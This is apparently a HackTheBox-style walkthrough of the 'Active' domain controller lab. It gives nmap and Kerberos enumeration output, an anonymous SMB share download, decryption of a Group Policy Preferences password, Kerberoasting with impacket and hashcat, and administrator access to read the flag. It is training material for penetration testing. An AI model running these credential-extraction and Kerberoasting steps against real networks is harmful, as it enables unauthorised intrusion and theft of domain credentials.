PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-08-08 07:32:39Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49169/tcp open msrpc Microsoft Windows RPC 49171/tcp open msrpc Microsoft Windows RPC 49182/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
In alternative to nmap we can use the metasploit module auxiliary/gather/kerberos_enumusers.
1 2 3
[+] 10.10.10.100:88 - User: "administrator" is present [+] 10.10.10.100:88 - User: "dc" is present [-] 10.10.10.100:88 - User: "guest" account disabled or locked out
First of all we downloaded the Replication share that do not require authentication: smbclient //10.10.10.100/Replication -U ""%"" -c 'prompt OFF;recurse ON;mget *'
From the active.htb folder we got a lot of files and folders but searching for pass with ripgrep we can read in Groups.xml a GPP password.
o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(cpassword)
print(o.decode())
We got the GPP password: GPPstillStandingStrong2k18.
The XML should be only in the SYSVOL share but the sysadmin created the share Replication as backup with anonymous access compromising the security of the entire system.
Now that we have username and password we can rerun nullinux tool to check other informations
[*] Enumerating: \\10.10.10.100\NETLOGON . D 0 Wed Aug 8 12:02:39 2018 .. D 0 Wed Aug 8 12:02:39 2018
[*] Enumerating: \\10.10.10.100\Replication . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 active.htb D 0 Sat Jul 21 12:37:44 2018
[*] Enumerating: \\10.10.10.100\SYSVOL . D 0 Wed Aug 8 12:02:40 2018 .. D 0 Wed Aug 8 12:02:40 2018 active.htb D 0 Wed Jul 18 20:48:57 2018 GHDLXVKonw D 0 Wed Aug 8 12:02:34 2018 vHDsdRgOTM D 0 Wed Aug 8 12:02:40 2018 WlCneTZBAq D 0 Wed Aug 8 12:01:57 2018
[*] Enumerating: \\10.10.10.100\Users . DR 0 Sat Jul 21 16:39:20 2018 .. DR 0 Sat Jul 21 16:39:20 2018 Administrator D 0 Mon Jul 16 12:14:21 2018 All Users DHS 0 Tue Jul 14 07:06:44 2009 Default DHR 0 Tue Jul 14 08:38:21 2009 Default User DHS 0 Tue Jul 14 07:06:44 2009 desktop.ini AHS 174 Tue Jul 14 06:57:55 2009 Public DR 0 Tue Jul 14 06:57:55 2009 SVC_TGS D 0 Sat Jul 21 17:16:32 2018
[*] Enumerating Domain Information for: 10.10.10.100 [+] Domain Name: ACTIVE [+] Domain SID: S-1-5-21-405608879-3187717380-1996298813
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False) SMB 10.10.10.100 445 DC [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18 GPP_PASS... 10.10.10.100 445 DC [+] Found SYSVOL share GPP_PASS... 10.10.10.100 445 DC [*] Searching for potential XML files containing passwords GPP_PASS... 10.10.10.100 445 DC [*] Found active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml GPP_PASS... 10.10.10.100 445 DC [+] Found credentials in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml GPP_PASS... 10.10.10.100 445 DC Password: GPPstillStandingStrong2k18 GPP_PASS... 10.10.10.100 445 DC userName: active.htb\SVC_TGS GPP_PASS... 10.10.10.100 445 DC noChange: 1 GPP_PASS... 10.10.10.100 445 DC neverExpires: 1 GPP_PASS... 10.10.10.100 445 DC description: GPP_PASS... 10.10.10.100 445 DC acctDisabled: 0 GPP_PASS... 10.10.10.100 445 DC newName: GPP_PASS... 10.10.10.100 445 DC changeLogon: 0 GPP_PASS... 10.10.10.100 445 DC action: U GPP_PASS... 10.10.10.100 445 DC fullName:
Since the username SVC_TGS recall the Kerberos TGS authentication we used impacket to ask Kerberos (port 88) the ticket for the Administrator user thanks to GetUserSPNs.py script.
With this hash we can start the cracking with hashcat (-m 13100).
The password for Administrator is Ticketmaster1968; we can validate those credentials with cme smb 10.10.10.100 -u "Administrator" -p "Ticketmaster1968" --shares and see what permission Administrator has over those shares.
Now we can access the C$ share and read the root flag.